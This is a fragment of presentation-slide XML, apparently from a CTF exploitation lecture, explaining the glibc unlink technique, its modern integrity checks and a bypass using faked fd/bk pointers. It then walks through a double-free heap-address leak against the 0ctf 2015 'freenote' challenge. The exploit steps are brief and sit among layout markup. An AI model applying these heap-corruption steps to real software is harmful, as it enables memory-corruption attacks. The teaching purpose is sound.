          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2568" name="Shape 2568"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565900" y="360957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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2569" name="Shape 2569"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565900" y="3858575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FD-&gt;fd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2570" name="Shape 2570"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565900" y="4107575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FD-&gt;bk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2571" name="Shape 2571"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2570" idx="1"/>
            <a:endCxn id="2565" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5620700" y="3734075"/>
            <a:ext cx="1945200" cy="49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2" name="Shape 2572"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2566" idx="3"/>
            <a:endCxn id="2568" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5620700" y="3734075"/>
            <a:ext cx="1945200" cy="249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3" name="Shape 2573"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564375" y="1337438"/>
            <a:ext cx="323460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#define unlink( P, BK, FD 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BK = P-&gt;bk;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FD = P-&gt;fd;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FD-&gt;bk = BK;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BK-&gt;fd = FD;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4" name="Shape 2574"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206325" y="1048250"/>
            <a:ext cx="4401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Old school unlink techique is easy: No checks!</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2575" name="Shape 2575"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488475" y="3008025"/>
            <a:ext cx="33864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assert(P-&gt;fd-&gt;bk == P) assert(P-&gt;bk-&gt;fd == P)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6" name="Shape 2576"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206325" y="2687150"/>
            <a:ext cx="4055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Unlink checks in modern glibc:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2577" name="Shape 2577"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538300" y="3801300"/>
            <a:ext cx="46029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a pointer X to  P(*X = P)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Fake P-&gt;fd = X - 0x18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Fake P-&gt;bk = X - 0x10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Trigger Unlink(P), We have *X = X - 0x18</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2578" name="Shape 2578"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206325" y="3514475"/>
            <a:ext cx="4055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Bypass:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2579" name="Shape 2579"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3173025" y="2844163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2580" name="Shape 2580"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3173025" y="3342163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bk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2581" name="Shape 2581"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3173025" y="3093163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fd</a:t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freenote (0ctf 2015) modified version</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2587" name="Shape 25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note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note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realloc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note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free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note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memory chunks</a:t>
            </a:r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Shape 25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 heap address using double free</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2593" name="Shape 25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Shape 2594"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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size=0x18</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2595" name="Shape 2595"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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596" name="Shape 2596"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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597" name="Shape 2597"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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598" name="Shape 2598"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584075" y="2670150"/>
            <a:ext cx="54351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add_note('A' * (0x20 - 8))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add_note('A' * (0x90 - 8))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add_note('A' * (0x90 - 8))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add_note('A' * (0x90 - 8))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add_note('A' * (0x90 - 8))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9" name="Shape 2599"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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2600" name="Shape 2600"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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0x604850</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2601" name="Shape 2601"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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2602" name="Shape 2602"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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603" name="Shape 2603"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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2604" name="Shape 2604"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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605" name="Shape 2605"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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6" name="Shape 2606"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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07" name="Shape 2607"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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08" name="Shape 2608"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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09" name="Shape 2609"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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10" name="Shape 2610"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591175" y="17806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611" name="Shape 2611"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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612" name="Shape 2612"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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613" name="Shape 2613"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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614" name="Shape 2614"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2679575" y="1780625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Shape 26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 heap address using double free</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2620" name="Shape 2620"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584075" y="2670150"/>
            <a:ext cx="24828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delete_note(3)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delete_note(1)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1" name="Shape 2621"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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2" name="Shape 2622"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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size=0x18</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2623" name="Shape 2623"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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24" name="Shape 2624"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2625" name="Shape 2625"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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26" name="Shape 2626"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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627" name="Shape 2627"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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28" name="Shape 2628"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2629" name="Shape 2629"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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30" name="Shape 2630"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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631" name="Shape 2631"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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2632" name="Shape 2632"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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0x604850</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2633" name="Shape 2633"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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2634" name="Shape 2634"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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635" name="Shape 2635"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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2636" name="Shape 2636"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="347405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0x604950</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2637" name="Shape 2637"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="404810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0x604870</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2638" name="Shape 2638"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="282460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unsorted bin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2639" name="Shape 2639"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190925" y="3073600"/>
            <a:ext cx="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0" name="Shape 2640"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190925" y="3723050"/>
            <a:ext cx="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1" name="Shape 2641"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5589325" y="3075650"/>
            <a:ext cx="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2" name="Shape 2642"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5585725" y="3717800"/>
            <a:ext cx="72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3" name="Shape 2643"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="2638" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="4321550" y="3444250"/>
            <a:ext cx="1371600" cy="381300"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd fmla="val -12443" name="adj1"/>
              <a:gd fmla="val 162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4" name="Shape 2644"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2638" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5589200" y="2949100"/>
            <a:ext cx="434100" cy="1343100"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd fmla="val -54855" name="adj1"/>
              <a:gd fmla="val 11429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5" name="Shape 2645"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591175" y="17806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646" name="Shape 2646"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2679575" y="17806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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2647" name="Shape 2647"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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648" name="Shape 2648"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4856375" y="17806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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2649" name="Shape 2649"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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Shape 26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 heap address using double free</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2655" name="Shape 2655"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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6" name="Shape 2656"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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size=0x18</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2657" name="Shape 2657"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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58" name="Shape 2658"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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659" name="Shape 2659"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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60" name="Shape 2660"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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661" name="Shape 2661"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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62" name="Shape 2662"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2663" name="Shape 2663"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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64" name="Shape 2664"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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665" name="Shape 2665"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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2666" name="Shape 2666"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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667" name="Shape 2667"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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2668" name="Shape 2668"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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669" name="Shape 2669"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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2670" name="Shape 2670"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591175" y="17806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671" name="Shape 2671"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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672" name="Shape 2672"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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673" name="Shape 2673"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4856375" y="17806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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2674" name="Shape 2674"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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675" name="Shape 2675"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584075" y="2670150"/>
            <a:ext cx="27876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add_note('A' * (0x90 - 8))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6" name="Shape 2676"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="404810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0x604850</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2677" name="Shape 2677"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="282460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unsorted bin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2678" name="Shape 2678"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190925" y="3073600"/>
            <a:ext cx="0" cy="9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9" name="Shape 2679"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5589325" y="3075725"/>
            <a:ext cx="600" cy="9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0" name="Shape 2680"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="2677" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="4321550" y="3444250"/>
            <a:ext cx="1371600" cy="381300"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd fmla="val -12443" name="adj1"/>
              <a:gd fmla="val 162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1" name="Shape 2681"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2677" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5589200" y="2949100"/>
            <a:ext cx="434100" cy="1343100"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd fmla="val -54855" name="adj1"/>
              <a:gd fmla="val 11429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Shape 26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 heap address using double free</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2687" name="Shape 2687"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584075" y="2670150"/>
            <a:ext cx="23817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trigger double free!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delete_note(3)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8" name="Shape 2688"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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9" name="Shape 2689"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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size=0x18</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2690" name="Shape 2690"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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1" name="Shape 2691"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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692" name="Shape 2692"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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93" name="Shape 2693"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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694" name="Shape 2694"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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95" name="Shape 2695"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2696" name="Shape 2696"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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97" name="Shape 2697"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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698" name="Shape 2698"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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2699" name="Shape 2699"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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700" name="Shape 2700"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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2701" name="Shape 2701"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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702" name="Shape 2702"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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2703" name="Shape 2703"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591175" y="17806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704" name="Shape 2704"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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705" name="Shape 2705"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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706" name="Shape 2706"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4856375" y="17806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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2707" name="Shape 2707"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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708" name="Shape 2708"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="347405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709" name="Shape 2709"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="404810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0x604850</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2710" name="Shape 2710"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="282460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unsorted bin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2711" name="Shape 2711"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190925" y="3073600"/>
            <a:ext cx="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2" name="Shape 2712"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190925" y="3723050"/>
            <a:ext cx="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3" name="Shape 2713"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5589325" y="3075650"/>
            <a:ext cx="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4" name="Shape 2714"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5585725" y="3717800"/>
            <a:ext cx="72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5" name="Shape 2715"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="2710" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="4321550" y="3444250"/>
            <a:ext cx="1371600" cy="381300"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd fmla="val -13417" name="adj1"/>
              <a:gd fmla="val 162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6" name="Shape 2716"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2710" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
